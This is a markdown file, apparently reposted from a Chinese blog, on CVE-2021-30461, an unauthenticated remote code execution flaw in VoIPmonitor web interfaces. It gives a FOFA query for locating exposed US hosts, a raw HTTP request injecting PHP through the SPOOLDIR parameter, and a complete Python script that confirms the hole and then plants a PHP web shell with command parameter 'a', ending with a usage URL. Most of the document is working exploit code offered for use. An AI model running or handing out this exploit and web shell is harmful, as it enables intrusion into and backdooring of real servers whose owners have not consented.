Skip to content

Latest commit

 

History

History
133 lines (106 loc) · 4.18 KB

CVE-2021-30461.md

File metadata and controls

133 lines (106 loc) · 4.18 KB
Raw

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

公众号

VoIPmonitor UnAuth RCE

=========================

原文链接:

https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/

FOFA:

title="VoIPmonitor" && country="US"

受影响的版本:

VoIPmonitor <= 24.60,漏洞分析见原文链接。

POC:

POST /index.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,vi;q=0.8,id;q=0.7,ja;q=0.6,zh-TW;q=0.5
Connection: close
Content-Length: 37

SPOOLDIR=test%22.system%28id%29.%22

原文给的脚本:

import argparse
from sys import argv,exit
import time
import random
import string

try:
    import requests
except ImportError:
    print("pip3 install requests ")

print("""
###############################################
#              VOIP Monitor RCE               #
###############################################
""")

headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Connection": "close"}

def get_target(args):
    hostname = args.host
    path = args.path
    if path:
        return f"http://{hostname}/{path}/index.php"
    else:
        return f"http://{hostname}/index.php"

def set_tmp(args):
    global headers
    target = get_target(args)
    n_data = {"SPOOLDIR": "/tmp", "recheck": "annen"}
    set_totmp = requests.post(target, n_data, headers=headers)
    print(f"[*] set /tmp {set_totmp}")

def checkVulnerability(args):
    global headers
    target = get_target(args)
    print(f"[+] Attacking {target}")
    testcmd = {"SPOOLDIR": "test\".system(id).\"", "recheck": "annen"}
    response_text = b"uid="
    testcmd_req = requests.post(target, testcmd, verify=False, headers=headers)
    if response_text in testcmd_req.content:
        print("[*] host is vulnerable")
    else:
        print("[-] host is not vulnerable")
        exit()
        
def uploadshell(args):
    global headers
    hostname = args.host
    path = args.path
    shell_path = ""
    shellfilename = str ( ''.join(random.choice(string.ascii_lowercase) for i in range(10)) )
    target = get_target(args)
    rce_payload = {"SPOOLDIR": f"/tmp\".file_put_contents('{shellfilename}.php','<?php echo system($_GET[\"a\"]);').\"", "recheck": "annen"}
    rce_req = requests.post(target, headers=headers, data=rce_payload)
    print(f"[*] uploading shell {rce_req.status_code}")
    if path:
        shell_path = f"http://{hostname}/{path}/{shellfilename}.php"
    else:
        shell_path = f"http://{hostname}/{shellfilename}.php"
    shell_check = requests.get(shell_path, headers=headers, params={'a':'id'})
    print(f"[*] RCE Check : {shell_check.text}")
    print(f"[*] Your Shell at {shell_path}")

def main():
    parser = argparse.ArgumentParser(description='VoIP Monitor all versions command execution')
    parser.add_argument('-t','--host',help='Host', type=str)
    parser.add_argument('-b', '--path',help='Path of the VoIP Monitor', type=str)
    args = parser.parse_args()
    set_tmp(args)
    checkVulnerability(args)
    set_tmp(args)
    uploadshell(args)
    set_tmp(args)

if __name__ == "__main__":
    main()

脚本会传密码为 a 的一句话木马:

http://x.x.x.x/twyongzyih.php?a=ifconfig